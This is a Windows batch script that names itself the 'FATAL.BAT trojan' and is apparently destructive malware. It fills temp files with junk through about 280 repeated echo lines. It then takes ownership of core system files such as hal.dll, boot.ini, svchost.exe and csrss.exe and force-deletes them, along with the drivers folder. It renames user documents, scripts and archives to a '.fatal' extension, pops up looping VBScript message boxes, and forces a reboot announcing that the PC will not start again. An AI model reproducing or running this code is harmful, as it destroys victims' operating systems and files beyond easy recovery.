echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
takeown /f C:\Windows\System32\hal.dll
del /f /q C:\Windows\System32\hal.dll
takeown /f C:\boot.ini
del /f /q C:\boot.ini
takeown /f C:\Windows\System32\wininit.exe
del /f /q C:\Windows\System32\wininit.exe
takeown /f C:\Windows\System32\svchost.exe
del /f /q C:\Windows\System32\svchost.exe
takeown /f C:\Windows\System32\csrss.exe
del /f /q C:\Windows\System32\csrss.exe
takeown /f C:\Windows\System32\drivers
del /f /q C:\Windows\System32\drivers
cd %temp%
echo YOUR PC HAS BEEN DESTROYED BY THE FATAL.BAT TROJAN, YOUR PC WILL NOT BOOT UP AGAIN>>RIP.txt
start RIP.txt
if exist *.bat ren *.bat *.fatal
if exist *.exe ren *.exe *.fatal
if exist *.msi ren *.msi *.fatal
if exist *.scr ren *.scr *.fatal
if exist *.docx ren *.docx *.fatal
if exist *.docm ren *.docm *.fatal
if exist *.xlsx ren *.xlsx *.fatal
if exist *.xlsm ren *.xlsm *.fatal
if exist *.ps1 ren *.ps1 *.fatal
if exist *.psm1 ren *.psm1 *.fatal
if exist *.cs ren *.cs *.fatal
if exist *.css ren *.css *.fatal
if exist *.vbs ren *.vbs *.fatal
if exist *.wsh ren *.wsh *.fatal
if exist *.jse ren *.jse *.fatal
if exist *.js ren *.js *.fatal
if exist *.py ren *.py *.fatal
if exist *.pyw ren *.pyw *.fatal
if exist *.cmd ren *.cmd *.fatal
if exist *.c ren *.c *.fatal
if exist *.cpp ren *.cpp *.fatal
if exist *.rar ren *.rar *.fatal
if exist *.zip ren *.zip *.fatal
if exist *.html ren *.html *.fatal
if exist *.dll ren *.dll *.fatal
if exist *.ini ren *.ini *.fatal
if exist *.sys ren *.sys *.fatal
echo.x=msgbox ("Still using this computer?",16,"lol")>>lol.vbs
echo.do>>Error.vbs
echo.x=msgbox ("Couldnt click me away",48,"Windows Error")>>Error.vbs
echo.loop>>Error.vbs
cd %USERPROFILE%
timeout 5
start www.google.co.ck/search?q=adoomyxx+github
timeout 5
start www.google.co.ck/search?q=how+2+buy+weed
timeout 5
start www.google.co.ck/search?q=how+2+get+free+robux
timeout 5
start www.google.co.ck/search?q=g3t+r3kt
start lol.vbs
timeout 5
start lol.vbs
timeout 5
start Error.vbs
start Error.vbs
start lol.vbs
start lol.vbs
timeout 5
start www.google.co.ck/search?q=help+how+do+i+remove+a+virus?
start Error.vbs
start lol.vbs
timeout 5
cd %temp%
echo.alert ("This is the last payload so enjoy");>>alert.js
start alert.js
cd %USERPROFILE%
timeout 7
cd %temp%
echo @echo off>>random.bat
echo cd %temp%>>random.bat
echo echo.x=msgbox ("Your PC has been destroyed",2+16,"Last Payload")>>last.vbs>>random.bat
echo :loop>>random.bat
echo start last.vbs>>random.bat
echo goto loop
start random.bat
timeout 3
shutdown -r -t 60 -c YOUR PC HAS BEEN DESTROYED BY FATAL.BAT
